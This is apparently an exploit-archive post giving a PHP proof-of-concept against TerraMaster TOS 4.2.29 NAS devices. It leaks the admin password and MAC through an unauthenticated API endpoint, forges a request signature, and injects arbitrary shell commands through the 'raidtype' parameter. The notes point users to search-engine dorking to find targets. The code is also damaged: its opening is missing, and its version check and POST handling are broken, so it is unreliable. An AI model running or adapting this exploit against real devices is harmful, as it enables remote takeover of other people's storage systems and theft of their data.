============================================================================================================================================= | # Title : TerraMaster TOS 4.2.29 Code Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) | | # Vendor : https://www.terra-master.com/global/alltos/ | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] uses the CURL to Allow remote command . [+] Line 138 set your target . [+] save code as poc.php . [+] USage : cmd => c:\www\test\php poc.php [+] PayLoad : targetUri = rtrim($targetUri, '/') . '/'; } public function getData() { // Get the data by exploiting the LFI vulnerability through vulnerable endpoint `api.php?mobile/webNasIPS` $response = $this->sendRequest('POST', 'module/api.php?mobile/webNasIPS', ['User-Agent' => 'TNAS']); if ($response && strpos($response, 'webNasIPS successful') !== false) { // Parse the JSON response and get the data $resJson = json_decode($response, true); if (!empty($resJson['data'])) { $this->data['password'] = trim(explode('SAT', explode('PWD:', $resJson['data'])[1])[0]); $this->data['mac'] = trim(explode('"', explode('mac":"', $resJson['data'])[1])[0]); $this->data['key'] = substr($this->data['mac'], 6, 6); // last three MAC address entries $this->data['timestamp'] = time(); // derive signature $this->data['signature'] = $this->tosEncryptStr($this->data['key'], $this->data['timestamp']); } } } private function tosEncryptStr($key, $strToEncrypt) { $id = $key . $strToEncrypt; return md5($id); } public function executeCommand($cmd) { // Execute RCE using vulnerable endpoint `api.php?mobile/createRaid` $diskstring = $this->generateRandomString(4, 8); $headers = [ 'User-Agent' => 'TNAS', 'Authorization' => $this->data['password'], 'Signature' => $this->data['signature'], 'Timestamp' => $this->data['timestamp'] ]; $this->sendRequest('POST', 'module/api.php?mobile/createRaid', [ 'raidtype' => ';' . $cmd, 'diskstring' => $diskstring ], $headers); } public function getTerramasterInfo() { // get Terramaster CPU architecture and TOS version $response = $this->sendRequest('GET', 'tos/index.php?user/login'); if ($response) { preg_match('/ver=.+?"/', $response, $matches); if ($matches) { $version = $matches[0]; // check if architecture is ARM64 or X64 if (strpos($version, '_A') !== false) { $this->terramaster['cpu_arch'] = 'ARM64'; } elseif (strpos($version, '_S') !== false || strpos($version, '_Q') !== false) { $this->terramaster['cpu_arch'] = 'X64'; } else { $this->terramaster['cpu_arch'] = 'UNKNOWN'; } // strip TOS version number and remove trailing double quote. $this->terramaster['tos_version'] = rtrim(substr($version, strpos($version, '.0_') + 3), '"'); } } } public function check() { $this->getTerramasterInfo(); if (empty($this->terramaster)) { return 'Safe'; } if (version_compare($this->terramaster['tos_version'], '4.2.29', '<=') === 0) { return "Vulnerable: TOS version is {$this->terramaster['tos_version']} and CPU architecture is {$this->terramaster['cpu_arch']}."; } return "Safe: TOS version is {$this->terramaster['tos_version']} and CPU architecture is {$this->terramaster['cpu_arch']}."; } public function exploit() { $this->getData(); if (empty($this->data)) { throw new Exception('Cannot retrieve the leaked data.'); } echo "Executing exploit...\n"; // Example command to execute $this->executeCommand('whoami'); // Replace 'whoami' with desired command } private function sendRequest($method, $uri, $data = [], $headers = []) { $url = $this->targetUri . $uri; $options = [ CURLOPT_RETURNTRANSFER => true, CURLOPT_CUSTOMREQUEST => strtoupper($method), CURLOPT_HTTPHEADER => array_merge(['Content-Type: application/x-www-form-urlencoded'], $headers) ]; if (strtoupper($method) === 'POST') { $options[CURLOPT_POSTFIELDS] = http_build_query($data); } else { $options[CURLOPT_URL] = $url; } $ch = curl_init(); curl_setopt_array($ch, $options); $response = curl_exec($ch); curl_close($ch); return $response; } private function generateRandomString($minLength, $maxLength) { $length = rand($minLength, $maxLength); return substr(str_shuffle(str_repeat("ABCDEFGHIJKLMNOPQRSTUVWXYZ", $maxLength)), 0, $length); } } // Usage $exploit = new TerraMasterExploit('http://target-terramaster-url.com'); $check = $exploit->check(); echo $check . "\n"; if (strpos($check, 'Vulnerable') !== false) { $exploit->exploit(); } Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================